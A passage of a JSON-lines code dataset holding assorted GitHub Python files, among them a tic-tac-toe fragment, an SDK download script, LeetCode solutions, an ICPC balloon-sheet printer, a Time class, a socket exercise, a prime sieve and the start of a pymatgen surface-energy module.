else '0'\n                checkWinning(matrix,win,turn)\n                turn=1-turn\n                marked+=1\n            else:\n                print(\"Already Occupied\")\n        except:\n            print(\"Invalid Position\")\n    for mat in matrix:\n        print(*mat)\n    if win[0]:\n        print(\"\\n{} WINS\".format(players[0]))\n    elif win[1]:\n        print(\"\\n{} WINS\".format(players[1]))\n    else:\n        print(\"\\nDRAW\")","repo_name":"YashnitKalra/Tic-Tac-Toe","sub_path":"Tic_Tac_Toe.py","file_name":"Tic_Tac_Toe.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15525239147","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom future.standard_library import install_aliases\ninstall_aliases()\n\nimport os, sys, zipfile\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom io import BytesIO\n\ndef download(platform, tag, destination):\n    try:\n        response = urlopen(\"https://cdn.hykr.io/res/riks/{0}/{1}/latest/libriks-{0}-{1}.zip\".format(platform, tag))\n    except HTTPError:\n        # Probe the parent URLs to report whether the tag or the platform is invalid\n        try:\n            urlopen(\"https://cdn.hykr.io/res/riks/{0}\".format(platform))\n            raise Exception(\"{0} is not a valid tag for this platform.\".format(tag))\n        except HTTPError:\n            try:\n                urlopen(\"https://cdn.hykr.io/res/riks\")\n                raise Exception(\"{0} is not a valid platform.\".format(platform))\n            except HTTPError as err:\n                raise Exception(\"{0}: {1}\".format(err.code, err.reason))\n\n    # Check destination\n    if not os.path.isdir(destination):\n        os.makedirs(destination)\n\n    zipdata = BytesIO()\n    total = int(response.headers[\"content-length\"])\n    size = 0\n    blockSize = 1024\n    lastPercent = 0\n\n    while True:\n        block = response.read(blockSize)\n        if not block:\n            break\n        zipdata.write(block)\n        size += len(block)\n        percent = int(round(100 * size / total))\n        if percent > lastPercent:\n            hash = ((60 * percent) // 100)\n            print(\"[{}{}] {}%\".format('#' * hash, ' ' * (60 - hash), percent) + '\\r', end='')\n            lastPercent = percent\n\n    with zipfile.ZipFile(zipdata) as z:\n        z.extractall(destination)\n\ndef main():\n    # Check number of arguments: platform and tag are required, destination is optional\n    if len(sys.argv) < 3:\n        raise Exception(\"Usage: python download.py <platform> <tag> (<destination>)\")\n\n    download(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else \".\")\n\nif __name__ == '__main__':\n    try:\n        main()\n    except Exception as e:\n        print(str(e))\n","repo_name":"hyker/riks-hello-world-cpp","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4731197194","text":"# Given an integer array nums sorted in non-decreasing order, return an array of the squares of each number sorted in non-decreasing order.\n\n# Example 1:\n\n# Input: nums = [-4,-1,0,3,10]\n# Output: [0,1,9,16,100]\n# Explanation: After squaring, the array becomes [16,1,0,9,100].\n# After sorting, it becomes [0,1,9,16,100].\n\nfrom typing import List\n\nclass Solution:\n    def sortedSquares(self, nums: List[int]) -> List[int]:\n        ln = len(nums)\n        for right in range(ln):\n            if nums[right] >= 0:\n                break\n        \n        left = right - 1\n        res = []\n        while right < ln or left >= 0:\n            if left >= 0 and right < ln:\n                if abs(nums[left]) > nums[right]:\n                    res.append(nums[right]**2)\n                    right += 1\n                else:\n                    res.append(nums[left]**2)\n                    left -= 1\n            elif left >= 0:\n                res.append(nums[left]**2)\n                left -= 1\n            elif right < ln:\n                res.append(nums[right]**2)\n                right += 1\n        return res\n","repo_name":"dimoka777/leetcode-solutions","sub_path":"977. 
Squares of a Sorted Array.py","file_name":"977. Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1540956572","text":"#!/usr/bin/env python3\nimport sys, os, argparse, re, json\nimport time\nfrom lxml import etree\nfrom bs4 import BeautifulSoup as Soup\nfrom subprocess import run\n\n### Setup argument parser\nparser = argparse.ArgumentParser(description=\"Balloon Sheet Printer\")\nparser.add_argument('-l','--log',default='balloon.log',\n help='Store delivered balloons (default: balloon.log)')\nparser.add_argument('-c','--cont',default=True,type=eval,\n help='Continue to deliver (default: True)')\n\nargs = parser.parse_args()\n\nos.makedirs('printed',exist_ok=True)\n\nwith open(args.log,'at'):\n pass\n\ndelivered = {}\nif args.cont:\n with open(args.log) as FILE:\n for line in FILE:\n try:\n teamID, probID, runID, penalty = line.strip().split()\n delivered[(teamID,probID)]={'run': runID, 'time': penalty}\n except:\n print('failed to parse old log:',line.strip(),file=sys.stderr)\n\n# Main loop\nline_buf = []\nfor line in sys.stdin:\n line = line.strip()\n # print('ECHO',line,file=sys.stderr)\n # print('LINE_BUF',line_buf,file=sys.stderr)\n if len(line_buf) == 0 and line == '':\n line_buf.append(line)\n elif len(line_buf):\n line_buf.append(line)\n if line_buf and line == '':\n s = Soup('\\n'.join(line_buf),'lxml')\n if s.find('judged').text == 'True' and s.find('solved').text == 'true':\n runID = s.find('id').text\n probID = chr(ord('A')-1+int(s.find('problem').text))\n teamID = s.find('team').text\n penalty = int(float(s.find('time').text)/60)\n # Supposed to be printed here\n if (teamID,probID) not in delivered:\n filename = 'printed/T{}_P{}_R{}'.format(teamID,probID,runID)\n with open(filename,'wt') as FILE:\n print('''\n\n Balloon Delivery Sheet\n\n\n\n\n\n Team {} solved Problem {}\n Run {} at {} minutes\n\n\n\n\n\n Delivered by:\n'''.format(teamID,probID,runID,penalty),file=FILE)\n run(['lp','-o','lpi=1.9','-o','cpi=3.5',filename])\n with open(args.log,'at') as FILE:\n print(teamID,probID,runID,penalty,file=FILE)\n delivered[(teamID,probID)]={'run': runID, 'time': penalty}\n time.sleep(1)\n line_buf = []\n\nprint('The connection to the event feeder is closed.')\n","repo_name":"mzshieh/tw-icpc-pc2","sub_path":"balloon/balloon.py","file_name":"balloon.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"18179265619","text":"class Time:\n def __init__(self,h,m,s):\n self.hour = h\n self.min = m\n self.sec = s\n self.fix()\n\n def show(self):\n print(self.hour,\":\",self.min,\":\",self.sec)\n\n def sum (self, other):\n sec = self.sec + other.sec\n min = self.min + other.min\n hour = self.hour + other.hour\n\n result = Time(hour, min, sec)\n self.fix()\n return result\n\n def sud(self,other):\n sec = self.sec - other.sec\n min = self.min - other.min\n hour = self.hour - other.hour\n \n result = Time(hour, min, sec)\n self.fix()\n return result\n \n def time_to_sec(self):\n result = (self.hour * 60 + self.min) * 60 + self.sec\n return result\n @staticmethod\n def sec_to_time(second):\n secs = second\n hour = secs//3600\n min = (secs - hour * 3600) // 60\n sec = (secs - hour * 3600) - min * 60\n result = Time(hour, min, sec)\n return result\n def thr_to_gmt(self):\n tehran_time = Time(3, 30, 0)\n result = Time.sum(self, tehran_time)\n return result\n def 
fix(self):\n        if self.sec >= 60:\n            while True:\n                if self.sec >= 60:\n                    self.sec -= 60\n                    self.min += 1\n                else:\n                    break\n        if self.min>=60:\n            while True:\n                if self.min >= 60:\n                    self.min -= 60\n                    self.hour += 1\n                else:\n                    break\n        if self.sec < 0:\n            while True:\n                if self.sec < 0:\n                    self.sec += 60\n                    self.min -= 1\n                else:\n                    break\n        if self.min < 0:\n            while True:\n                if self.min < 0:\n                    self.min += 60\n                    self.hour -= 1\n                else:\n                    break\n    \ndef show_menu():\n    print(\"Time Class\")\n    print(\"1.Summation Times\")\n    print(\"2.Subtraction Times\")\n    print(\"3.Time to Second\")\n    print(\"4.Seconds to Time\")\n    print(\"5.GMT to Tehran\")\n\nwhile True:\n    show_menu()\n    choose = input(\"\\nEnter number of your choice : \")\n\n    if choose == \"1\":\n        sec1 = int(input(\"Enter first second : \"))\n        min1 = int(input(\"Enter first minute : \"))\n        hour1 = int(input(\"Enter first hour : \"))\n        sec2 = int(input(\"Enter second second : \"))\n        min2 = int(input(\"Enter second minute : \"))\n        hour2 = int(input(\"Enter second hour : \"))\n        time1 = Time(hour1, min1, sec1)\n        time2 = Time(hour2, min2, sec2)\n        result = time1.sum(time2)\n        result.show()\n    elif choose == \"2\":\n        sec1 = int(input(\"Enter first second : \"))\n        min1 = int(input(\"Enter first minute : \"))\n        hour1 = int(input(\"Enter first hour : \"))\n        sec2 = int(input(\"Enter second second : \"))\n        min2 = int(input(\"Enter second minute : \"))\n        hour2 = int(input(\"Enter second hour : \"))\n        time1 = Time(hour1, min1, sec1)\n        time2 = Time(hour2, min2, sec2)\n        result = time1.sud(time2)\n        result.show()\n    elif choose == \"3\":\n        sec = int(input(\"Enter second : \"))\n        min = int(input(\"Enter minute : \"))\n        hour = int(input(\"Enter hour : \"))\n        time = Time(hour, min, sec)\n        result = time.time_to_sec()\n        print(result)\n    elif choose == \"4\":\n        second = int(input(\"Enter seconds : \"))\n        result = Time.sec_to_time(second)\n        result.show()\n    elif choose == \"5\":\n        sec = int(input(\"Enter second : \"))\n        min = int(input(\"Enter minute : \"))\n        hour = int(input(\"Enter hour : \"))\n        time = Time(hour, min, sec)\n        result = time.thr_to_gmt()\n        result.show()\n    elif choose == \"exit\":\n        exit()\n    else:\n        print(\"Please just enter number of your choice or enter 'exit' to exit\\n\\n\")\n    \n","repo_name":"SobhanSaeedi7/Python-Course-Assaignments","sub_path":"Homework-11/2.Time.py","file_name":"2.Time.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"28447783942","text":"import socket\nimport host\nimport datetime\nimport exam\nimport json\nimport time\nimport random\n\n\nclass Elf(host.Host):\n\t\"\"\" Elf class\n\n\tArguments:\n\t\tthreading {Thread} -- runnable\n\t\"\"\"\n\n\tdef __init__(self, config):\n\t\t\"\"\" Constructor\n\n\t\tArguments:\n\t\t\tconfig {dict} -- server\n\t\t\"\"\"\n\t\thost.Host.__init__(self, config)\n\t\tself.client = socket.socket()\n\t\tself.santa_addr = (self.config[\"santa\"].config[\"host\"],\n\t\t                   self.config[\"santa\"].config[\"port\"])\n\t\tself.fairy_addr = (self.config[\"fairy\"].config[\"host\"],\n\t\t                   self.config[\"fairy\"].config[\"port\"])\n\t\tself.one_more = False\n\t\tself.fairy = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.logger.info(\"\\t\\tFinished initializing %s, id: %s\",\n\t\t                 self.__class__.__name__, self.config['id'])\n\t\tself.dismissed = False\n\n\tdef run(self):\n\t\t\"\"\" Upon thread start\n\t\t\"\"\"\n\t\tself.client.connect(self.santa_addr)\n\t\tself.fairy.connect(self.fairy_addr)\n\t\twhile not 
self.dismissed:\n\n\t\t\trequest = {\"action\": \"where\"}\n\t\t\tself.client.sendall(json.dumps(request))\n\t\t\tdata = self.client.recv(4096)\n\t\t\tresult = json.loads(data)\n\t\t\tself.logger.info(\"\\t\\tClient recieved result for login: %s\", data)\n\t\t\tif result['result'] == 'nowhere':\n\t\t\t\tself.logger.error('no more destination..')\n\t\t\t\tself.dismissed = True\n\t\t\telse:\n\t\t\t\ttime.sleep(random.randint(1, 11))\n\t\t\t\tresponse = {\"action\": \"done\"}\n\t\t\t\tself.client.sendall(json.dumps(response))\n\t\t\t\tdata = self.client.recv(4096)\n\t\t\t\tresult = json.loads(data)\n\n\t\t\t\tif result['result'] == 'good_job':\n\t\t\t\t\tself.logger.info(\"\\tHooray!\")\n\t\t\t\telif result['result'] == 'dismissed':\n\t\t\t\t\tself.dismissed = True\n\t\t\t\t\tself.logger.critical(\"\\tBoo-hoo!\")\n\t\t\t\t\tfairy_request = json.dumps({\"action\": \"help\"})\n\t\t\t\t\tself.fairy.sendto(fairy_request, self.fairy_addr)\n\t\t\t\t\tself.logger.info(\"\\t\\t\\tWent to the fairy!: %s\", fairy_request)\n\n\t\t\t\t\tfairy_response_str, address = self.fairy.recvfrom(4096)\n\t\t\t\t\tself.logger.info(\"\\t\\t\\tGot message from the fairy!: %s\",\n\t\t\t\t\t fairy_response_str)\n\t\t\t\t\tfairy_response = json.loads(fairy_response_str)\n\t\t\t\t\tif fairy_response[\"response\"] == 'nowhere':\n\t\t\t\t\t\tself.logger.critical(\"\\tBoo-hoo-HOO!\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.logger.critical(\"\\tYES!\")\n\t\t\t\t\t\tself.one_more = True\n\t\t\t\t\t\tself.dismissed = False\n\t\t\"\"\"\n\t\tfor message in self.messages:\n\t\t\ttime.sleep(1)\n\t\t\tself.client.sendall(message)\n\t\t\tself.logger.info(\"\\t\\tClient request sent: %s\", message)\n\t\t\tdata = self.client.recv(4096)\n\t\t\tself.logger.info(\"\\t\\tClient recieved response: %s\", data)\n\t\t\tresult = json.loads(data)\n\n\t\t\tself.logger.info(\"\\t\\t\\t\\t result of: %s, is: %s\", message, result[\"result\"])\n\t\t\n\t\t\"\"\"\n\t\tself.client.close()\n\n\nif __name__ == '__main__':\n\texam.run()\n","repo_name":"AlexAegis/elte-cn","sub_path":"exam/exam_elf.py","file_name":"exam_elf.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"3719065711","text":"import sys\n\nkey = sys.argv[1:]\nif key:\n with open('bakery.csv', encoding='utf-8') as f:\n sales = [line.strip() for line in f.readlines()]\n if len(key) == 1:\n sale = sales[int(key[0]):]\n print('\\n'.join(sale))\n elif len(key) == 2:\n sale = sales[int(key[0]):int(key[1]) + 1]\n print('\\n'.join(sale))\n\nwith open('bakery.csv', encoding='utf-8') as f:\n sales = [line.strip() for line in f.readlines()]\n print(sales[1:])\n","repo_name":"evgenytihonov/Basic_Python","sub_path":"Lesson_6/show_sales.py","file_name":"show_sales.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34190347433","text":"# UTS PBO - Andhi Prasetyo - C20010004\n\nclass Kasir: # Nama Class\n nopesanan = 0\n hargaTotal = 0\n hargaTambahan = 0\n hargabayar = 0\n\n def __init__(self, # Constructor\n inputnama, \n inputjml, \n inputharga\n ):\n\n self.nama = inputnama\n self.jumlah = inputjml\n self.harga = inputharga\n\n Kasir.nopesanan += 1\n Kasir.hargaTotal = self.jumlah * self.harga\n Kasir.hargaTambahan = DataTransaksi.jumlah * DataTransaksi.harga\n Kasir.hargabayar = Kasir.hargaTotal + Kasir.hargaTambahan\n\n def tampil(self):\n print(\"\\n\")\n print(\"===== TAMPIL TRANSAKSI =====\")\n 
print(\"Nomor Pesanan\\t: \", Kasir.nopesanan)\n print(\"Nama Pesanan\\t: \", self.nama)\n print(\"Jumlah Pesanan\\t: \", self.jumlah)\n print(\"Harga Satuan\\t: \", self.harga)\n print(\"Total Harga\\tNo: \", Kasir.hargaTotal)\n\n def total(self):\n print(\"\\n\")\n print(\"== TOTAL PEMBAYARAN ==\")\n print(\"Total Harga Bayar\\t: \", Kasir.hargabayar)\n print(\"\\n\")\n print(\"== TRANSAKSI SELESAI ==\")\n\nclass DataTransaksi(Kasir):\n\n print(\"\\n\")\n print(\"== INPUT DATA TAMBAHAN ==\")\n tambahan1 = input(\"Tambahan Item\\t: \")\n jumlah = int(input(\"Jumlah Item\\t: \"))\n harga = int(input(\"Harga Item\\t: \"))\n\n def tampiltambahan(self):\n print(\"\\n\")\n print(\"Tambah Pesanan\\t: \", DataTransaksi.tambahan1)\n print(\"Jumlah Tambahan\\t: \",DataTransaksi.jumlah)\n print(\"Harga Satuan\\t: \",DataTransaksi.harga)\n print(\"Harga Total\\t: \", Kasir.hargaTambahan)\n\n\nprint(\"\\n\")\nprint(\"== INPUT DATA PESANAN ==\")\ntransaksi1 = DataTransaksi(\n input(\"Nama Item\\t: \"), \n int(input(\"Jumlah Item\\t: \")), \n int(input(\"Harga Satuan\\t: \"))\n)\n\ntransaksi1.tampil()\ntransaksi1.tampiltambahan()\ntransaksi1.total()","repo_name":"trebuchet-uby/python-dev","sub_path":"OOP.UTS/Program2Kasir.py","file_name":"Program2Kasir.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"17571688831","text":"from collections import deque\n\n\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n \"\"\"\n 239. Sliding Window Maximum\n https://leetcode.com/problems/sliding-window-maximum/description/\n\n Explanation:\n Window position Max\n --------------- -----\n 0 1 2 3 4 5 6 7\n [1 3 -1]3 1 3 6 7 3\n 1 [3 -1 3] 1 3 6 7 3\n 1 3 [-1 3 1] 3 6 7 3\n 1 3 -1 [3 1 3] 6 7 3\n 1 3 -1 3 [1 3 6] 7 6\n 1 3 -1 3 1 [3 6 7] 7\n\n k = 2\n index 0 1 2 3\n value 1 1 1 1\n\n Use deque\n - remove index from window, remove index <= i - k (2 - 2) 0\n - remove indices having values smaller than or equals to the value to be added.\n A left emement in dq is always greater than the right element of it.\n - dq[0] is the current max in the window, add the dq[0] since i >= k - 1 (1)\n\n index [0 1] 2\n value [4 > 3] 2\n\n result = 1 1 1\n\n Time complexity: O(n)\n Space complexity: O(n + k)\n\n \"\"\"\n\n if not nums or not k or k == 0:\n return []\n\n if k == 1:\n return nums\n\n len_nums = len(nums)\n dq = deque()\n result = list()\n\n for i in range(len_nums):\n if dq and dq[0] <= i - k: # 2 <= 3 - 2\n dq.popleft()\n while dq and nums[dq[-1]] <= nums[i]: #\n dq.pop()\n dq.append(i) # index 2\n # value 1\n if i >= k - 1: # 1 >= 1\n result.append(nums[dq[0]])\n\n return result # [1, 1, 1]\n","repo_name":"flowant/practicePython","sub_path":"answers/239. Sliding Window Maximum.py","file_name":"239. 
Sliding Window Maximum.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18785527219","text":"# https://www.spoj.com/problems/PRIME1/\n\ndef prime2(start, end):\n res = []\n a = [False] * 2 + [True] * (end - 1)\n # print(a, len(a))\n for (n, isprime) in enumerate(a):\n if isprime:\n if not n < start:\n # yield n\n res.append(n)\n for i in range(n*n, end+1 , n):\n a[i] = False\n return res\n#\n#\n# tescase = int(input())\n# while tescase > 0:\n# start,end = map(int,input().split(' '))\n# for item in prime2(start, end):\n# print(item)\n# tescase -= 1\n\nimport math\n\ndef prime_sieve(n):\n \"\"\"Use the Sieve of Eratosthenes to list primes 0 to n.\"\"\"\n primes = list(range(n+1))\n primes[1] = 0\n for i in range(4, n+1, 2):\n primes[i] = 0\n for x in range(3, int(math.sqrt(n))+1, 2):\n if primes[x]:\n for i in range(2*primes[x], n+1, primes[x]):\n primes[i] = 0\n return filter(None, primes)\n\ndef ranged_primes(x, y):\n \"\"\"List primes between x and y.\"\"\"\n # primes = prime_sieve(int(math.sqrt(y)))\n # print(list(primes))\n primes = prime2(x,int(math.sqrt(y)))\n print(primes)\n return [n for n in range(x, y) if all(n % p for p in primes)]\n\nprint(ranged_primes(0, 100))","repo_name":"shivam0071/exploringPython","sub_path":"Competitive Programming/SPOJ/PRIME1.py","file_name":"PRIME1.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"16911097555","text":"# Imports\nimport torch, torchvision, numpy as np, matplotlib.pyplot as plt\nfrom torch import nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torchvision import transforms, datasets, models\nfrom torch.utils.data import DataLoader\nimport time\nimport copy\nfrom PIL import Image\n\nimport argparse\nimport json\n\n\ndef get_input_args():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('data_dir', type=str, help='path to the folder containing the images')\n # options\n parser.add_argument('--save_dir', type = str, default='', help = 'path to the folder for saving the model checkpoint')\n parser.add_argument('--arch', type = str, default = 'vgg16', help = 'architecture of the CNN')\n parser.add_argument('--learning_rate', type = float, default = 0.001, help = 'learning rate for training the model')\n parser.add_argument('--hidden_units', type = int, default = 512, help = 'number of hidden units for the classifier')\n parser.add_argument('--epochs', type = int, default = 20, help = 'number of epochs for training the model')\n parser.add_argument('--gpu', action='store_true', default = False, help = 'to enable gpu')\n\n return parser.parse_args()\n\n\ndef train_model(model, criterion, optimizer, num_epochs, gpu, train_dataloader, valid_dataloader):\n\n # use dropout\n model.train()\n\n # GPU or CPU\n if gpu and torch.cuda.is_available():\n model.cuda()\n else:\n model.cpu()\n \n total_step = len(train_dataloader)\n \n # Iterate over each epoch\n for epoch in range(num_epochs):\n train_loss = 0\n \n # Iterate over each image\n for step, (inputs, labels) in enumerate(train_dataloader):\n if gpu and torch.cuda.is_available():\n inputs = Variable(inputs.float().cuda())\n labels = Variable(labels.long().cuda()) \n else:\n inputs = Variable(inputs)\n labels = Variable(labels) \n \n # Forward pass\n optimizer.zero_grad()\n outputs = model.forward(inputs)\n loss = criterion(outputs, labels)\n \n # 
Backward prop\n            loss.backward()\n            optimizer.step() \n            train_loss += loss.item()\n\n            # Calculate validation loss\n            if (step+1) % 50 == 0:\n                valid_loss, valid_acc = valid_model(model, criterion, gpu, valid_dataloader)\n                model.train()  # valid_model() switches to eval mode; re-enable dropout for training\n                print ('Epoch [{}/{}] '.format(epoch+1, num_epochs),\n                       'Step [{}/{}] '.format(step+1, total_step),\n                       'Train Loss: {:.3f}'.format(train_loss),\n                       'Valid Loss: {:.3f}'.format(valid_loss),\n                       'Valid Accuracy: {:.3f}'.format(valid_acc))\n\n\ndef valid_model(model, criterion, gpu, valid_dataloader):\n    \n    # no dropout\n    model.eval()\n    \n    valid_loss = 0\n    valid_acc = 0\n    \n    n_valid_imgs = len(valid_dataloader)\n    \n    # Iterate over each image\n    for inputs, labels in iter(valid_dataloader):\n        if gpu and torch.cuda.is_available():\n            inputs = Variable(inputs.float().cuda())\n            labels = Variable(labels.long().cuda()) \n        else:\n            inputs = Variable(inputs)\n            labels = Variable(labels) \n        \n        # Forward pass\n        outputs = model.forward(inputs)\n        loss = criterion(outputs, labels)\n\n        # update loss\n        valid_loss += loss.item()\n        \n        # update accuracy\n        ps = torch.exp(outputs).data \n        equality = (labels.data == ps.max(1)[1])\n        valid_acc += equality.type_as(torch.FloatTensor()).mean()\n    \n    return valid_loss/n_valid_imgs, valid_acc/n_valid_imgs\n\n\ndef main():\n\n    # get arguments from command line\n    args = get_input_args()\n\n\n    # load data\n    data_dir = args.data_dir\n    train_dir = data_dir + '/train'\n    valid_dir = data_dir + '/valid'\n    test_dir = data_dir + '/test'\n\n    # Define transforms for the training, validation, and testing sets\n    train_transform = transforms.Compose([\n        transforms.RandomResizedCrop(224),\n        transforms.RandomHorizontalFlip(),\n        transforms.ToTensor(),\n        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n    ])\n\n    valid_transform = transforms.Compose([\n        transforms.Resize(256),\n        transforms.CenterCrop(224),\n        transforms.ToTensor(),\n        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n    ])\n\n    test_transform = transforms.Compose([\n        transforms.Resize(256),\n        transforms.CenterCrop(224),\n        transforms.ToTensor(),\n        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n    ])\n\n    # Load the datasets with ImageFolder\n    train_dataset = datasets.ImageFolder(train_dir, train_transform)\n    valid_dataset = datasets.ImageFolder(valid_dir, valid_transform)\n    test_dataset = datasets.ImageFolder(test_dir, test_transform)\n\n    # Using the image datasets and the transforms, define the dataloaders\n    train_dataloader = DataLoader(train_dataset, batch_size=64)\n    valid_dataloader = DataLoader(valid_dataset, batch_size=64)\n    test_dataloader = DataLoader(test_dataset, batch_size=64)\n\n\n    # Load the pre-trained network\n    model = getattr(models, args.arch)(pretrained=True)\n\n    # freeze weights of pre-trained network\n    for param in model.parameters():\n        param.requires_grad = False\n\n    # get label mapping\n    with open('cat_to_name.json', 'r') as f:\n        cat_to_name = json.load(f)\n\n    # get number of input units for the classifier\n    input_units = model.classifier[0].in_features\n\n    # Define a new, untrained feed-forward network\n    classifier = nn.Sequential(\n        nn.Linear(in_features=input_units, out_features=args.hidden_units, bias=True),\n        nn.ReLU(),\n        nn.Dropout(p=0.25),\n        nn.Linear(in_features=args.hidden_units, out_features=len(cat_to_name), bias=True)\n    )\n    model.classifier = classifier\n\n    # get Hyper-parameters from command line args\n    num_epochs = args.epochs\n    learning_rate = args.learning_rate\n    criterion = nn.CrossEntropyLoss()\n    gpu = args.gpu\n    optimizer = 
optim.SGD(model.classifier.parameters(), lr=learning_rate)\n\n # train model\n train_model(model, criterion, optimizer, num_epochs, gpu, train_dataloader, valid_dataloader)\n\n # save model\n checkpoint_filename = args.save_dir + 'model_checkpoint.pth'\n model.class_to_idx = train_dataset.class_to_idx\n checkpoint = {'model': model,\n 'optimizer': optimizer,\n 'class_to_idx': model.class_to_idx,\n 'model_state_dict': model.state_dict(), \n 'optimizer_state_dict': optimizer.state_dict(), \n }\n torch.save(checkpoint, checkpoint_filename)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"vinny-palumbo/PyTorch-Image-Classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15166896015","text":"from train_curveadj_fuzzynet import CurveAdjFuzzyNet\nfrom matplotlib.pyplot import subplots\n\nclass PlotCurveAdjFuzzyNet(CurveAdjFuzzyNet):\n def __init__(\n self,\n population_size: int,\n tournament_size: float,\n n_generations: int,\n range_considered,\n mutation_allowed: bool,\n **kwargs\n ) -> None:\n \n super().__init__(population_size, tournament_size, n_generations, range_considered, mutation_allowed)\n\n self.fig, self.axes = subplots(nrows=1, ncols=2, **kwargs)\n self.func_x, self.func_y = [], []\n\n\n def plot_curves(self, i: int, **kwargs) -> None:\n self.axes[0].clear()\n self.axes[0].plot(self.actual_values, color='blue')\n\n func_with_coef = self.function_to_eval(self.func_string, self.top_winners[i])\n est_curve = self.curve_values(func_with_coef)\n \n self.axes[0].plot(est_curve, **kwargs)\n self.axes[0].set_ylim(top=max(self.actual_values)*1.1)\n\n self.axes[0].set_title(\"Curva real vs estimada\")\n\n\n def plot_error(self, i: int) -> None:\n min_error, max_error = self.top_errors[-1], self.top_errors[0]\n top_error = self.top_errors[i]\n\n self.func_x.append(i)\n self.func_y.append(top_error)\n\n self.axes[1].clear()\n \n error = f'Gen #{str(i+1).zfill(3)} error: {top_error:.2f}'\n self.axes[1].set_title(error)\n # self.axes[1].set_xlim([0, self.n_gen])\n self.axes[1].set_ylim([min_error*0.9, max_error*1.1])\n\n self.axes[1].plot(self.func_x, self.func_y, color='blue')\n\n\n def plot_curveadj(self, i, **kwargs) -> None:\n self.plot_curves(i, **kwargs)\n self.plot_error(i)\n","repo_name":"Afroefras/UAG_MCC","sub_path":"inteligencia_artificial/curveadj_fuzzynet/plot_curveadj_fuzzynet.py","file_name":"plot_curveadj_fuzzynet.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29291082718","text":"\"\"\"\nThis module defines tools to analyze surface and adsorption related\nquantities as well as related plots. If you use this module, please\nconsider citing the following works::\n\n R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,\n S. P. Ong, \"Surface Energies of Elemental Crystals\", Scientific\n Data, 2016, 3:160080, doi: 10.1038/sdata.2016.80.\n\n and\n\n Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale\n stabilization of sodium oxides: Implications for Na-O2 batteries.\n Nano Letters, 14(2), 1016-1020. https://doi.org/10.1021/nl404557w\n\n and\n\n Montoya, J. H., & Persson, K. A. (2017). A high-throughput framework\n for determining adsorption energies on solid surfaces. 
Npj\n Computational Materials, 3(1), 14.\n https://doi.org/10.1038/s41524-017-0017-z\n\nTodo:\n- Still assumes individual elements have their own chempots\n in a molecular adsorbate instead of considering a single\n chempot for a single molecular adsorbate. E.g. for an OH\n adsorbate, the surface energy is a function of delu_O and\n delu_H instead of delu_OH\n- Need a method to automatically get chempot range when\n dealing with non-stoichiometric slabs\n- Simplify the input for SurfaceEnergyPlotter such that the\n user does not need to generate a dict\n\"\"\"\n\nfrom __future__ import annotations\n\nimport copy\nimport itertools\nimport random\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sympy import Symbol\nfrom sympy.solvers import linsolve, solve\n\nfrom pymatgen.analysis.wulff import WulffShape\nfrom pymatgen.core import Structure\nfrom pymatgen.core.composition import Composition\nfrom pymatgen.core.surface import get_slab_regions\nfrom pymatgen.entries.computed_entries import ComputedStructureEntry\nfrom pymatgen.io.vasp.outputs import Locpot, Outcar\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\nfrom pymatgen.util.due import Doi, due\nfrom pymatgen.util.plotting import pretty_plot\n\nEV_PER_ANG2_TO_JOULES_PER_M2 = 16.0217656\n\n__author__ = \"Richard Tran\"\n__credits__ = \"Joseph Montoya, Xianguo Li\"\n\n\nclass SlabEntry(ComputedStructureEntry):\n \"\"\"\n A ComputedStructureEntry object encompassing all data relevant to a\n slab for analyzing surface thermodynamics.\n\n Attributes:\n miller_index (tuple): Miller index of plane parallel to surface.\n label (str): Brief description for this slab.\n adsorbates (list): List of ComputedStructureEntry for the types of adsorbates.\n clean_entry (SlabEntry): SlabEntry for the corresponding clean slab for an adsorbed slab.\n ads_entries_dict (dict): Dictionary where the key is the reduced composition of the\n adsorbate entry 